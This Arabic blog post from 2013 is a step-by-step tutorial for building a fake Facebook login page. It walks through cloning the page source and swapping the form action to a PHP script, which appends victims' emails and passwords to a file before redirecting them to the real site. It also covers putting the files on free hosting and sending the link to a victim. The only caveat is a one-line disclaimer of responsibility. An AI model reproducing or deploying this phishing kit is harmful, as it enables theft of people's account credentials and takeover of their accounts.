الأربعاء، 27 نوفمبر، 2013

كيف تصمم صفحة مزورة بنفسك لموقع الفيسبوك


: لأي موقع لا بد لك من توفر ثلاث ملفات مشتركة "Phishing" لصنع صفحة 
: وهي
 (الصفحة الوهمية) HTML ملف 
(لتتبع التفاصيل داخل الصفحة التي أنشأتها) PHP ملف 
(لحفظ جميع المعلومات في شكل نص) Txt ملف




توجّه إلى الصفحة الرئيسية للفيسبوك

ثم اضغط في أي مكان بزر الماوس الأيمن ومن القائمة التي تظهر اختر
"view page source
 (تأكد من تمام عملية تحميل الصفحة كاملة) "login page" 





لإختيار جميع الصفحة ثم قم بعمليتي نسخ ولصقمن لوحة المفاتيح اضغط على

 المفتاحين ( CTRL + A ) 

لجميع أكواد هذه الصفحة على الnotepad
 اضغط على المفتاحين (CTRL + F)  للبحث عن الكلمة ي "action"  وسوف تعثر على الكود التالي


       action="https://www.facebook.com/login.php?login_attempt=1"    



 استبدل الكود المبين أعلاه بالكود التالي

  action="samir.php"  


  بعدما استبدلته إلى samir.php
اضغط على المفناح
 (CTRL + S) 

لحفظ هذا الملف بامتداد

(anyname.html) أو facebook.html 
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة

الآن نأتي إلى انشاء الملف الثاني وهو ملف PHP  


notepad
وببساطة لإنشاء هذا الملف قم بنسخ كود الPHP التالي ثم الصقه على محرر ال notepad 
احفظه بالإمتداد الذي اخترته سابقا samir.php

<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
  
وهذه صورة للكود php


//*//*/*/*/*/*/*/*/*/**/*/***********************///////*/*/*/*/*/*/*/*/*//*/*/

 هو الرابط الذي يقوم بتوجيه الضحية بمجرّد ادخال معلومتي تسجيل الدخول‘http://www.facebook.com‘
 الإيميل والباسوورد) ثم الضغط على
"connection"
 وبتمام هذه الخطوة نكون قد اتممنا انشاء ملفPHP

 الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ

 بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين  إلى الموقع

facebook.html
samir.php

 تأكد من أن هذان الملفان في نفس المجلّد

بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتهاسابقا 

. (facebook.html 

 استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة آليا على نفس المجلّد تحمل اسم"connection" على الصفحة الوهمية  ويضغط على
. تحتوي على كلا من اسم المستخدم وباسوورد الضحية (password.html


انا غير مسؤول 

0 التعليقات:

إرسال تعليق

لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا